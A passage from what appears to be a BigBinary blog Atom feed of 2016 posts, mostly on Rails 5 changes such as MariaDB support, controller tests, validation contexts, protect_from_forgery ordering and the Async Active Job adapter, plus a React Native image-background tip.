      <id>https://www.bigbinary.com/blog/using-image-as-a-container-in-react-native</id>
      <content type="html"><![CDATA[<p>Adding a nice looking background to a screen makes an app visually appealing. Italso makes the app look more sleek and elegant. Let us see how we can leveragethis technique in React Native and add an image as a background.</p><p>Well need to create different sizes of the background image, which were goingto use as a container. React Native will pick up appropriate image based on thedevices dimension (check<a href="http://facebook.github.io/react-native/docs/images.html#content">Images guide</a>for more information).</p><pre><code class="language-plaintext">- login-background.png (375x667)- login-background@2x.png (750x1134)- login-background@3x.png (1125x2001)</code></pre><p>Now well use these images in our code as container.</p><pre><code class="language-javascript">//...render() {    return (      &lt;Image        source={require('./images/login-background.png')}        style={styles.container}&gt;        &lt;Text style={styles.welcome}&gt;          Welcome to React Native!        &lt;/Text&gt;        &lt;Text style={styles.instructions}&gt;          To get started, edit index.ios.js        &lt;/Text&gt;        &lt;Text style={styles.instructions}&gt;          Press Cmd+R to reload,{'\n'}          Cmd+D or shake for dev menu        &lt;/Text&gt;      &lt;/Image&gt;    );  }//...const styles = StyleSheet.create({  container: {    flex: 1,    width: undefined,    height: undefined,    backgroundColor:'transparent',    justifyContent: 'center',    alignItems: 'center',  },});</code></pre><p>Weve intentionally left height and width of the image as <code>undefined</code>. This willlet React Native take the size of the image from the image itself. This way, wecan use Image component as View and add other components as a children to buildUI.</p><p><img src="/blog_images/2016/using-image-as-a-container-in-react-native/image-as-container-react-native.png" alt="image as container in react native"></p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 - What's in it for me?]]></title>
       <author><name>Prathamesh Sonpatki</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-webinar"/>
      <updated>2016-04-22T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-webinar</id>
      <content type="html"><![CDATA[<p>I recently did a webinar with Srijan on upcoming changes in Rails 5. In thiswebinar I discussed various features and additions coming up in Rails 5.</p><p>&lt;div class=&quot;youtube-video-container&quot;&gt;&lt;iframewidth=&quot;640&quot;height=&quot;480&quot;src=&quot;https://www.youtube.com/embed/ECDX1NH7yWE&quot;frameborder=&quot;0&quot;allowfullscreen</p><blockquote><p>&lt;/iframe&gt;&lt;/div&gt;</p></blockquote><h2>Major Features</h2><p>Ruby 2.2.2+ dependency.</p><p>Action Cable.</p><p>API only apps.</p><h2>Features for Development mode</h2><p>Puma as default web server.</p><p><code>rails</code> CLI over <code>rake</code>.</p><p>Restarting app using <code>rails restart</code>.</p><p>Enable caching using <code>rails dev:cache</code>.</p><p>Enhanced filtering of routes using <code>rails routes -g</code></p><p>Evented file system monitor.</p><h2>Features for Test mode</h2><p>Test Runner.</p><p>Changes to controller tests.</p><h2>Features related to Caching</h2><p>Cache content forever using <code>http_cache_forever</code>.</p><p>Collection caching using <code>ActiveRecord#cache_key</code>.</p><p>Partials caching using multi_fetch_fragments.</p><p>Caching in Action Mailer views.</p><h2>Changes in Active Record</h2><p>Introduction of <code>ApplicationRecord</code>.</p><p><code>ActiveRelation#or</code>.</p><p><code>has_secure_token</code> for generating secure tokens.</p><p>Versioned migrations for backward compatibility.</p><h2>Changes in Active Support</h2><p>Improvements to Date/Time.</p><p><code>Enumerable#pluck</code>, <code>Enumerable#without</code>.</p><p>Change in behavior related to halting callback chains.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 officially supports MariaDB]]></title>
       <author><name>Vipul</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-official-supports-mariadb"/>
      <updated>2016-04-21T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-official-supports-mariadb</id>
      <content type="html"><![CDATA[<p><a href="https://mariadb.org/">MariaDB</a> is an open source fork of the MySQL database andit acts as a drop-in replacement for MySQL.</p><p>After the Oracle's<a href="https://www.theguardian.com/technology/2009/dec/14/monty-widenius-oracle-protest">take over</a>of<a href="http://www.infoworld.com/article/2630216/database/many-open-sourcers-back-an-oracle-takeover-of-mysql.html">MySQL</a>there was some confusion about the future of MySQL. To remove any ambiguityabout whether in future MySQL will remain free or not MariaDB<a href="https://en.wikipedia.org/wiki/MariaDB?oldformat=true">was started</a> .</p><p>Some of you might be wondering what advantages MariaDB offers over MySQL.Here isan article which lists<a href="https://seravo.fi/2015/10-reasons-to-migrate-to-mariadb-if-still-using-mysql">10 reasons</a>to migrate to MariaDB from MySQL.</p><p>MariaDB is bundled as default on systems like<a href="http://www.itwire.com/business-it-news/open-source/60292-red-hat-ditches-mysql-switches-to-mariadb">Redhat's RHEL 7+</a>,<a href="https://www.archlinux.org/news/mariadb-replaces-mysql-in-repositories/">Archlinux</a>,<a href="http://www.slackware.com/index.html">Slackware</a> and<a href="http://marc.info/?l=openbsd-ports-cvs&amp;m=141063182731679&amp;w=2">OpenBSD</a>.</p><p>Some of the users of MariaDB are Google, Mozilla, Facebook and<a href="http://blog.wikimedia.org/2013/04/22/wikipedia-adopts-mariadb/">Wikipedia</a>.Later we found out that <a href="https://basecamp.com/">Basecamp</a> has<a href="https://github.com/rails/rails/pull/24454#issuecomment-206994634">already been using MariaDB</a>for a while.</p><h2>Active Record support for MariaDB</h2><p>Recently, <a href="https://github.com/iangilfillan">Ian Gilfillan</a> from MariaDBFoundation sent a <a href="https://github.com/rails/rails/pull/24454">Pull Request</a> toinclude MariaDB as part Rails Documentation.</p><p>Accepting that pull request means Rails is<a href="https://github.com/rails/rails/pull/24522">committing to</a> supporting MariaDBalong with MySQL, PostgreSQL and SQLite.</p><p>The tests revealed an <a href="https://travis-ci.org/rails/rails/jobs/122573447">issue</a>related to micro-precision support on time column.</p><p>If a column has time field and if we search on that column then the search wasfailing for MariaDB.</p><pre><code class="language-ruby">time = ::Time.utc(2000, 1, 1, 12, 30, 0, 999999)Task.create!(start: time)Task.find_by(start: time) # =&gt; nil</code></pre><p>In the above case we created a record. However query yielded no record.</p><p>Now let's see why the query did not work for MariaDB.</p><h2>MariaDB vs MySQL time column difference</h2><p>First let's examine the <code>tasks</code> table.</p><pre><code class="language-sql"> mysql&gt; desc tasks;+--------+---------+------+-----+---------+----------------+| Field  | Type    | Null | Key | Default | Extra          |+--------+---------+------+-----+---------+----------------+| id     | int(11) | NO   | PRI | NULL    | auto_increment || start  | time    | YES  |     | NULL    |                |+--------+---------+------+-----+---------+----------------+2 rows in set (0.00 sec)</code></pre><p>In the above case column <code>start</code> is of type <code>time</code>.</p><p>Let's insert a record in <code>tasks</code> table.</p><pre><code class="language-sql">mysql&gt; INSERT INTO `tasks` (`start`) VALUES ('2000-01-01 12:30:00');</code></pre><p>Now let's query the table.</p><pre><code class="language-sql">mysql&gt; SELECT  `tasks`.* FROM `tasks` WHERE `tasks`.`start` = '2000-01-01 12:30:00' LIMIT 1;Empty set (0.00 sec)</code></pre><p>In the above case query is passing date part(2000-01-01) along with the timepart(12:30:00) for column <code>start</code> and we did not get any result.</p><p>Now let's query again but this time we will pass only the time part to the<code>start</code> column.</p><pre><code class="language-sql">mysql&gt; SELECT  `tasks`.* FROM `tasks` WHERE `tasks`.`start` = '12:30:00' LIMIT 1;+----+----------+| id | start    |+----+----------+|  1 | 12:30:00 |+----+----------+1 row in set (0.00 sec)</code></pre><p>So in the query if we pass <code>2000-01-01 12:30:00</code> to a column which is of type<code>time</code> then MariaDB fails.</p><p>Passing <code>2000-01-01 12:30:00</code> to MySQL, PostgreSQL and SQLite will work fine.That's because the adapters for those databases will drop the date part if dateis passed in the query string.</p><p>For MariaDB similar action was needed and soon enough a<a href="https://github.com/rails/rails/pull/24542">Pull Request</a>, to take care of thisbehavior from Rails side, was landed. MariaDB is itself,<a href="https://jira.mariadb.org/browse/MDEV-9541">working</a> on supporting this behaviornow.</p><h2>Summary</h2><p>In summary Rails 5 officially supports MariaDB and MariaDB can now safely beused as an alternative to MySQL for Ruby on Rails Applications.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Changes to test controllers in Rails 5]]></title>
       <author><name>Abhishek Jain</name></author>
      <link href="https://www.bigbinary.com/blog/changes-to-test-controllers-in-rails-5"/>
      <updated>2016-04-19T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/changes-to-test-controllers-in-rails-5</id>
      <content type="html"><![CDATA[<p>In Rails 5, controller tests have undergone some major changes. In this blogpost, we will walk through some of those changes.</p><h3>ActionController::TestCase is deprecated</h3><p>In Rails 5, controller tests are generated with superclass<code>ActionDispatch::IntegrationTest</code> instead of <code>ActionController::TestCase</code> whichis deprecated (Link is not available) . It will be moved into a separate gem inRails 5.1 .</p><p>Rails 5 will use <code>ActionDispatch::IntegrationTest</code> by default for generatingscaffolds as well<a href="https://github.com/rails/rails/pull/22569">controller tests stubs</a>.</p><h3>Use URL instead of action name with request methods in Rails 5</h3><p>In Rails 4.x, we pass controller action as shown below.</p><pre><code class="language-ruby">class ProductsControllerTest &lt; ActionController::TestCase  def test_index_response    get :index    assert_response :success  endend</code></pre><p>But in Rails 5, controller tests expect to receive URL instead of action (Linkis not available). Otherwise test will throw exception<code>URI::InvalidURIError: bad URI</code>.</p><pre><code class="language-ruby">class ProductsControllerTest &lt; ActionDispatch::IntegrationTest  def test_index    get products_url    assert_response :success  endend</code></pre><p>If we are upgrading an older Rails 4.x app to Rails 5, which have test caseswith superclass <code>ActionController::TestCase</code>, then they will continue to work asit is without requiring to change anything from above.</p><h2>Deprecation of assigns and assert_template in controller tests</h2><p>In Rails 4.x, we can test instance variables assigned in a controller action andwhich template a particular controller action renders using <code>assigns</code> and<code>assert_template</code> methods.</p><pre><code class="language-ruby">class ProductsControllerTest &lt; ActionController::TestCase  def test_index_template_rendered    get :index    assert_template :index    assert_equal Product.all, assigns(:products)  endend</code></pre><p>But in Rails 5, calling <code>assert_template</code> or <code>assigns</code> will throw an exception.</p><pre><code class="language-ruby">class ProductsControllerTest &lt; ActionDispatch::IntegrationTest  def test_index_template_rendered    get products_url    assert_template :index    assert_equal Product.all, assigns(:products)  endend# Throws exceptionNoMethodError: assert_template has been extracted to a gem. To continue using it,  add `gem 'rails-controller-testing'` to your Gemfile.</code></pre><p>These two methods have now been<a href="https://github.com/rails/rails/pull/20138">removed</a> from the core and moved toa separate gem<a href="https://github.com/rails/rails-controller-testing">rails-controller-testing</a>.If we still want to use <code>assert_template</code> and <code>assigns</code>, then we can do this byadding this gem in our applications.</p><h2>Reasons for removing assigns and assert_template</h2><p>The idea behind the removal of these methods is that instance variables andwhich template is rendered in a controller action are internals of a controller,and controller tests should not care about them.</p><p>According to Rails team, controller tests should be more concerned about what isthe result of that controller action like what cookies are set, or what HTTPcode is set rather than testing of the internals of the controller. So, thesemethods are removed from the core.</p><h2>Use of Keywords arguments in HTTP request methods in Rails 5</h2><p>In Rails 4.x, we pass various arguments like params, flash messages and sessionvariables to request method directly.</p><pre><code class="language-ruby">class ProductsControllerTest &lt; ActionController::TestCase  def test_show    get :show, { id: user.id }, { notice: 'Welcome' }, { admin: user.admin? }    assert_response :success  endend</code></pre><p>Where <code>{ id: user.id }</code> are params, <code>{ notice: 'Welcome' }</code> is flash and<code>{ admin: user.admin? }</code> is session.</p><p>This becomes confusing sometimes, as it is not clear which argument belongs towhich part.</p><p>Now in Rails 5, request methods accept only<a href="https://github.com/rails/rails/pull/18323/">keyword arguments</a>.</p><pre><code class="language-ruby">class ProductsControllerTest &lt; ActionDispatch::IntegrationTest  def test_create    post product_url, params: { product: { name: &quot;FIFA&quot; } }    assert_response :success  endend</code></pre><p>This makes it easier to understand what arguments are being passed.</p><p>When we pass arguments without keywords arguments, then Rails logs a deprecationwarning.</p><pre><code class="language-ruby">class ProductsControllerTest &lt; ActionDispatch::IntegrationTest  def test_create    post product_url, { product: { name: &quot;FIFA&quot; } }    assert_response :success  endendDEPRECATION WARNING: ActionDispatch::IntegrationTest HTTP request methods will acceptonly the following keyword arguments in future Rails versions:params, headers, env, xhr</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[accessed_fields to find active fields in application]]></title>
       <author><name>Abhishek Jain</name></author>
      <link href="https://www.bigbinary.com/blog/accesssed-fields-to-find-actually-used-fileds-in-Rails-5"/>
      <updated>2016-04-18T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/accesssed-fields-to-find-actually-used-fileds-in-Rails-5</id>
      <content type="html"><![CDATA[<p>Rails makes it very easy to select all the fields of a table.</p><pre><code class="language-ruby">@users = User.all</code></pre><p>Above code is selecting all the columns of the table <code>users</code>. This might be okin most cases. However in some cases we might want to select only certaincolumns for performance reason. The difficult task is finding what all columnsare actually used in a request.</p><p>To help in this task, Rails 5 has added<a href="https://github.com/rails/rails/commit/be9b68038e83a617eb38c26147659162e4ac3d2c">accessed_fields</a>method which lists attributes that were actually used in the operation.</p><p>This is helpful in development mode in determining what all fields are reallybeing used by the application.</p><pre><code class="language-ruby">class UsersController &lt; ApplicationController  def index    @users = User.all  endend</code></pre><pre><code class="language-erb"># app/views/users/index.html.erb&lt;table&gt;  &lt;tr&gt;    &lt;th&gt;Name&lt;/th&gt;    &lt;th&gt;Email&lt;/th&gt;  &lt;/tr&gt;  &lt;% @users.each do |user| %&gt;    &lt;tr&gt;      &lt;td&gt;&lt;%= user.name %&gt;&lt;/td&gt;      &lt;td&gt;&lt;%= user.email %&gt;&lt;/td&gt;    &lt;/tr&gt;  &lt;% end %&gt;&lt;/table&gt;</code></pre><p>Now, in order to find all the fields that were actually used, let's add<code>after_action</code> to the controller.</p><pre><code class="language-ruby">class UsersController &lt; ApplicationController  after_action :print_accessed_fields  def index    @users = User.all  end  private  def print_accessed_fields    p @users.first.accessed_fields  endend</code></pre><p>Let's take a look at the log file.</p><pre><code class="language-plaintext">Processing by UsersController#index as HTML  User Load (0.1ms) SELECT &quot;users&quot;.* FROM &quot;users&quot;  Rendered users/index.html.erb within layouts/application (1.0ms)  [&quot;name&quot;, &quot;email&quot;]</code></pre><p>As we can see, it returns <code>[&quot;name&quot;, &quot;email&quot;]</code> as attributes which were actuallyused.</p><p>If <code>users</code> table has 20 columns then we do not need to load values all thoseother columns. We are using only two columns. So let's change code to reflectthat.</p><pre><code class="language-ruby">class UsersController &lt; ApplicationController  def index    @users = User.select(:name, :email)  endend</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 Warning when fetching with Active Record]]></title>
       <author><name>Abhishek Jain</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-adds-option-to-log-warning-when-fetching-big-result-sets"/>
      <updated>2016-04-13T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-adds-option-to-log-warning-when-fetching-big-result-sets</id>
      <content type="html"><![CDATA[<p>With large data set we can run into memory issue. Here is an example.</p><pre><code class="language-ruby">&gt;&gt; Post.published.count=&gt; 25000&gt;&gt; Post.where(published: true).each do |post|     post.archive!   end# Loads 25000 posts in memory</code></pre><h2>Rails 5 adds warning when loading large data set</h2><p>To mitigate issue shown above Rails 5<a href="https://github.com/rails/rails/pull/18846">has added</a><code>config.active_record.warn_on_records_fetched_greater_than</code>.</p><p>When this configuration is set to an integer value, any query that returns thenumber of records greater than the set limit, logs a warning.</p><pre><code class="language-ruby">config.active_record.warn_on_records_fetched_greater_than = 1500&gt;&gt; Post.where(published: true).each do |post|     post.archive!   end=&gt; Query fetched 25000 Post records: SELECT &quot;posts&quot;.* FROM &quot;posts&quot; WHERE &quot;posts&quot;.&quot;published&quot; = ? [[&quot;published&quot;, true]]   [#&lt;Post id: 1, title: 'Rails', user_id: 1, created_at: &quot;2016-02-11 11:32:32&quot;, updated_at: &quot;2016-02-11 11:32:32&quot;, published: true&gt;, #&lt;Post id: 2, title: 'Ruby', user_id: 2, created_at: &quot;2016-02-11 11:36:05&quot;, updated_at: &quot;2016-02-11 11:36:05&quot;, published: true&gt;,....]</code></pre><p>This helps us find areas where potential problems exist and then we can replaceinefficient queries with better ones.</p><pre><code class="language-ruby">config.active_record.warn_on_records_fetched_greater_than = 1500&gt;&gt; Post.where(published: true).find_each do |post|     post.archive!   end# No warning is logged</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 Sending STDOUT via environment variable]]></title>
       <author><name>Mohit Natoo</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-allows-to-send-log-to-stdout-via-environment-variable"/>
      <updated>2016-04-12T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-allows-to-send-log-to-stdout-via-environment-variable</id>
      <content type="html"><![CDATA[<p>By default, Rails creates <code>log</code> directory in a file that is named after theenvironment in which the application is running. So in production environment,logs are by default directed to <code>production.log</code> file.</p><p>We will have to define custom loggers if these logs are to be directed toanother file or to standard output. Presence of such custom logic is whatenables Rails to direct logs to <code>STDOUT</code> along with <code>development.log</code> file indevelopment environment.</p><p>Rails 5, however,<a href="https://github.com/rails/rails/pull/23734">supports logging to STDOUT</a> inproduction environment through introduction of new environment variable<code>RAILS_LOG_TO_STDOUT</code>.</p><p>In a brand new Rails app, we can see the following snippet in <code>production.rb</code>file.</p><pre><code class="language-ruby">if ENV[&quot;RAILS_LOG_TO_STDOUT&quot;].present?  config.logger = ActiveSupport::TaggedLogging.new(Logger.new(STDOUT))end</code></pre><p>By setting <code>RAILS_LOG_TO_STDOUT</code> to any value we should have the production logsdirected to <code>STDOUT</code>.</p><p>We can see in the snippet above <code>config.logger</code> is overwritten. Therefore nowthe logs will not be directed to <code>production.log</code> file.</p><p>To opt out of this and revert to the original functionality, we can eitherassign a blank value to this environment constant or remove<code>RAILS_LOG_TO_STDOUT</code> from the list of environment constants.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Validate multiple contexts together in Rails 5]]></title>
       <author><name>Vijay Kumar Agrawal</name></author>
      <link href="https://www.bigbinary.com/blog/validate-multiple-contexts-in-rails-5"/>
      <updated>2016-04-08T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/validate-multiple-contexts-in-rails-5</id>
      <content type="html"><![CDATA[<p>Active Record<a href="http://guides.rubyonrails.org/active_record_validations.html">validation</a> is awell-known and widely used functionality of Rails. Slightly lesser popular isRails's ability to validate on custom context.</p><p>If used properly, contextual validations can result in much cleaner code. Tounderstand validation context, we will take example of a form which is submittedin multiple steps:</p><pre><code class="language-ruby">class MultiStepForm &lt; ActiveRecord::Base  validate :personal_info  validate :education, on: :create  validate :work_experience, on: :update  validate :final_step, on: :submission  def personal_info    # validation logic goes here..  end  # Smiliary all the validation methods go here.end</code></pre><p>Let's go through all the four validations one-by-one.</p><p><em>1. personal_info</em> validation has no context defined (notice the absence of<code>on:</code>). Validations with no context are executed every time a model save istriggered. Please go through all the triggers<a href="http://guides.rubyonrails.org/active_record_validations.html">here</a>.</p><p><em>2. education</em> validation has context of <code>:create</code>. It is executed <em>only</em> when anew object is created.</p><p><em>3. work_experience</em> validation is in <code>:update</code> context and gets triggered forupdates <em>only</em>. <code>:create</code> and <code>:update</code> are the only two pre-defined contexts.</p><p><em>4. final_step</em> is validated using a custom context named <code>:submission</code>. Unlikeabove scenarios, it needs to be explicitly triggered like this:</p><pre><code class="language-ruby">form = MultiStepForm.new# Eitherform.valid?(:submission)# Orform.save(context: :submission)</code></pre><p><code>valid?</code> runs the validation in given context and populates <code>errors</code>. <code>save</code>would first call <code>valid?</code> in the given context and persist the changes ifvalidations pass. Otherwise populates <code>errors</code>.</p><p>One thing to note here is that when we validate using an explicit context, Railsbypasses all other <em>contexts</em> including <code>:create</code> and <code>:update</code>.</p><p>Now that we understand validation context, we can switch our focus to <em>validatemultiple context together</em><a href="https://github.com/rails/rails/pull/21535">enhancement</a> in Rails 5.</p><p>Let's change our contexts from above example to</p><pre><code class="language-ruby">class MultiStepForm &lt; ActiveRecord::Base  validate :personal_info, on: :personal_submission  validate :education, on: :education_submission  validate :work_experience, on: :work_ex_submission  validate :final_step, on: :final_submission  def personal_info    # code goes here..  end  # Smiliary all the validation methods go here.end</code></pre><p>For each step, we would want to validate the model with all previous steps andavoid all future steps. Prior to Rails 5, this can be achieved like this:</p><pre><code class="language-ruby">class MultiStepForm &lt; ActiveRecord::Base  #...  def save_personal_info    self.save if self.valid?(:personal_submission)  end  def save_education    self.save if self.valid?(:personal_submission)              &amp;&amp; self.valid?(:education_submission)  end  def save_work_experience    self.save if self.valid?(:personal_submission)              &amp;&amp; self.valid?(:education_submission)              &amp;&amp; self.valid?(:work_ex_submission)  end  # And so on...end</code></pre><p>Notice that <code>valid?</code> takes only one context at a time. So we have to repeatedlycall <code>valid?</code> for each context.</p><p>This gets simplified in Rails 5 by enhancing <code>valid?</code> and <code>invalid?</code> to acceptan array. Our code changes to:</p><pre><code class="language-ruby">class MultiStepForm &lt; ActiveRecord::Base  #...  def save_personal_info    self.save if self.valid?(:personal_submission)  end  def save_education    self.save if self.valid?([:personal_submission,                              :education_submission])  end  def save_work_experience    self.save if self.valid?([:personal_submission,                              :education_submission,                              :work_ex_submission])  endend</code></pre><p>A tad bit cleaner I would say.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 changes protect_from_forgery execution order]]></title>
       <author><name>Vijay Kumar Agrawal</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-default-protect-from-forgery-prepend-false"/>
      <updated>2016-04-06T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-default-protect-from-forgery-prepend-false</id>
      <content type="html"><![CDATA[<p>What makes Rails a great framework to work with is its sane<a href="http://rubyonrails.org/doctrine/#convention-over-configuration">conventions over configuration</a>.Rails community is always striving to keep these conventions relevant over time.In this blog, we will see why and what changed in execution order of<code>protect_from_forgery</code>.</p><p><code>protect_from_forgery</code> protects applications against <a href="csrf-and-rails">CSRF</a>.Follow that link to read up more about <code>CSRF</code>.</p><h3>What</h3><p>If we generate a brand new Rails application in Rails 4.x then<code>application_controller</code> will look like this.</p><pre><code class="language-ruby">class ApplicationController &lt; ActionController::Base  protect_from_forgery with: :exceptionend</code></pre><p>Looking it at the code it does not look like <code>protect_from_forgery</code> is a<code>before_action</code> call but in reality that's what it is. Since<code>protect_from_forgery</code> is a <code>before_action</code> call it should follow the order ofhow other <code>before_action</code> are executed. But this one is special in the sensethat <code>protect_from_forgery</code> is executed first in the series of <code>before_action</code>no matter where <code>protect_from_forgery</code> is mentioned. Let's see an example.</p><pre><code class="language-ruby">class ApplicationController &lt; ActionController::Base  before_action :load_user  protect_from_forgery with: :exceptionend</code></pre><p>In the above case even though <code>protect_from_forgery</code> call is made after<code>load_user</code>, the protection execution happens first. And we can't do anythingabout it. We can't pass any option to stop Rails from doing this.</p><p>Rails 5<a href="https://github.com/rails/rails/commit/39794037817703575c35a75f1961b01b83791191">changes</a>this behavior by introducing a <code>boolean</code> option called <code>prepend</code>. Default valueof this option is <code>false</code>. What it means is, now <code>protect_from_forgery</code> getsexecuted in order of call. Of course, this can be overridden by passing<code>prepend: true</code> as shown below and now protection call will happen first justlike Rails 4.x.</p><pre><code class="language-ruby">class ApplicationController &lt; ActionController::Base  before_action :load_user  protect_from_forgery with: :exception, prepend: trueend</code></pre><h2>Why</h2><p>There isn't any real advantage in forcing <code>protect_from_forgery</code> to be the firstfilter in the chain of filters to be executed. On the flip side, there are caseswhere output of other <code>before_action</code> should decide the execution of<code>protect_from_forgery</code>. Let's see an example.</p><pre><code class="language-ruby">class ApplicationController &lt; ActionController::Base  before_action :authenticate  protect_from_forgery unless: -&gt; { @authenticated_by.oauth? }  private    def authenticate      if oauth_request?        # authenticate with oauth        @authenticated_by = 'oauth'.inquiry      else        # authenticate with cookies        @authenticated_by = 'cookie'.inquiry      end    endend</code></pre><p>Above code would fail in Rails 4.x, as <code>protect_from_forgery</code>, though calledafter <code>:authenticate</code>, actually gets executed before it. Due to which we wouldnot have <code>@authenticated_by</code> set properly.</p><p>Whereas in Rails 5, <code>protect_from_forgery</code> gets executed after <code>:authenticate</code>and gets skipped if authentication is oauth.</p><h2>Upgrading to Rails 5</h2><p>Let's take an example to understand how this change might affect the upgrade ofapplications from Rails 4 to Rails 5.</p><pre><code class="language-ruby">class ApplicationController &lt; ActionController::Base  before_action :set_access_time  protect_from_forgery  private    def set_access_time      current_user.access_time = Time.now      current_user.save    endend</code></pre><p>In Rails 4.x, <code>set_access_time</code> is <strong>not</strong> executed for <em>bad requests</em>. But itgets executed in Rails 5 because <code>protect_from_forgery</code> is called after<code>set_access_time</code>.</p><p>Saving data (<code>current_user.save</code>) in <code>before_action</code> is anyways a big enoughviolation of the best practices, but now those persistences would leave usvulnerable to CSRF if they are called before <code>protect_from_forgery</code> is called.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 provides config to use UUID as primary key]]></title>
       <author><name>Vijay Kumar Agrawal</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-provides-application-config-to-use-UUID-as-primary-key"/>
      <updated>2016-04-04T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-provides-application-config-to-use-UUID-as-primary-key</id>
      <content type="html"><![CDATA[<p>UUIDs are a popular alternative to auto-incremental integer primary keys.</p><pre><code class="language-ruby">create_table :users, id: :uuid do |t|  t.string :nameend</code></pre><p>Notice that <code>id: :uuid</code> is passed to create_table. This is all we need to do tohave UUID as primary key for <code>users</code>.</p><p>Now, if an application is designed to use UUID instead of Integer, then chancesare that new tables too would use UUID as primary key. And it can easily getrepetitive to add <code>id: :uuid</code> in <code>create_table</code> , every time a new model isgenerated.</p><p>Rails 5 comes up with <a href="https://github.com/rails/rails/pull/22033">a solution</a>.We need to set primary key as UUID in <code>config/application.rb</code>.</p><pre><code class="language-ruby">config.generators do |g|  g.orm :active_record, primary_key_type: :uuidend</code></pre><p>This automatically adds <code>id: :uuid</code> to <code>create_table</code> in all future migrations.</p><p>If we are using the latest version of PostgreSQL then we should enable<code>pgcrypto</code> extension as per<a href="https://guides.rubyonrails.org/active_record_postgresql.html#uuid">Rails guide</a>.</p><p>To enable <a href="https://www.postgresql.org/docs/8.3/pgcrypto.html">pgcrypto</a>extension we need a migration which does something like this.</p><pre><code class="language-ruby">class EnablePgcryptoExtension &lt; ActiveRecord::Migration  def change    enable_extension 'pgcrypto'  endend</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 changed Active Job default adapter to Async]]></title>
       <author><name>Mohit Natoo</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-changed-default-active-job-adapter-to-async"/>
      <updated>2016-03-29T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-changed-default-active-job-adapter-to-async</id>
      <content type="html"><![CDATA[<p>Active Job has built-in adapters for multiple queuing backends among which twoare intended for development and testing. They are<a href="http://api.rubyonrails.org/classes/ActiveJob/QueueAdapters/InlineAdapter.html">Active Job Inline Adapter</a>and<a href="http://api.rubyonrails.org/classes/ActiveJob/QueueAdapters/AsyncAdapter.html">Active Job Async Adapter</a>.</p><p>These adapters can be configured as follows.</p><pre><code class="language-ruby"># for Active Job InlineRails.application.config.active_job.queue_adapter = :inline# for Active Job AsyncRails.application.config.active_job.queue_adapter = :async</code></pre><p>In Rails 4.x the default queue adapter is <code>:inline</code>. In Rails 5 it has<a href="https://github.com/rails/rails/commit/625baa69d14881ac49ba2e5c7d9cac4b222d7022">been changed to</a><code>:async</code> by DHH.</p><h2>Asynchronous Execution</h2><p>In case of <code>inline</code>, as the name suggests, execution of the job happens in thesame process that invokes the job. In case of Async adapter, the job is executedasynchronously using in-process thread pool.</p><p><code>AsyncJob</code> makes use of a<a href="https://github.com/ruby-concurrency/concurrent-ruby">concurrent-ruby</a> threadpool and the data is retained in memory. Since the data is stored in memory, ifthe application restarts, this data is lost. Hence, <code>AsyncJob</code> should not beused in production.</p><h2>Running in future</h2><p><code>AsyncJob</code> supports running the job at some time in future through<code>perform_later</code>. <code>Inline</code> executes the job immediately and does not supportrunning the job in future.</p><p>Both Active Job Async and Active Job Inline do not support configuringpriorities among queues, timeout in execution and retry intervals/counts.</p><h2>Advantage of having Async as default adapter</h2><p>In Rails 4.x where <code>Inline</code> is the default adapter, the test cases weremistakenly dependent on job's behavior that happens synchronously indevelopment/testing environment. Using <code>Async</code> adapter ,by default, will helpusers have tests not rely on such synchronous behavior.</p><p>It's a step closer to simulating your production environment where jobs areexecuted asynchronously with more persistent backends.</p><p>Consider an example, where in an e-commerce site upon every order placed anemail is sent.</p><pre><code class="language-ruby">test &quot;order is created successfully&quot; do  # Code to test record in orders table is createdendtest &quot;order email is sent&quot; do  # Code to test order email is sentend</code></pre><p>The process of sending email can be part of a job which is invoked from an<code>after_create</code> callback in <code>Order</code> model.</p><pre><code class="language-ruby">class Order &lt; ActiveRecord::Base  after_create :send_order_email  def send_order_email    # Invoke the job of sending an email asynchronously.  endend</code></pre><p>When <code>Inline</code> adapter is used, any wrongly configured email settings will causeboth the above tests to fail. This is because the process of sending the emailhappens within the process of order creation and any error in sending the emailwould kill the process if unhandled.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Support for left outer join in Rails 5]]></title>
       <author><name>Ratnadeep Deshmane</name></author>
      <link href="https://www.bigbinary.com/blog/support-for-left-outer-joins-in-rails-5"/>
      <updated>2016-03-24T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/support-for-left-outer-joins-in-rails-5</id>
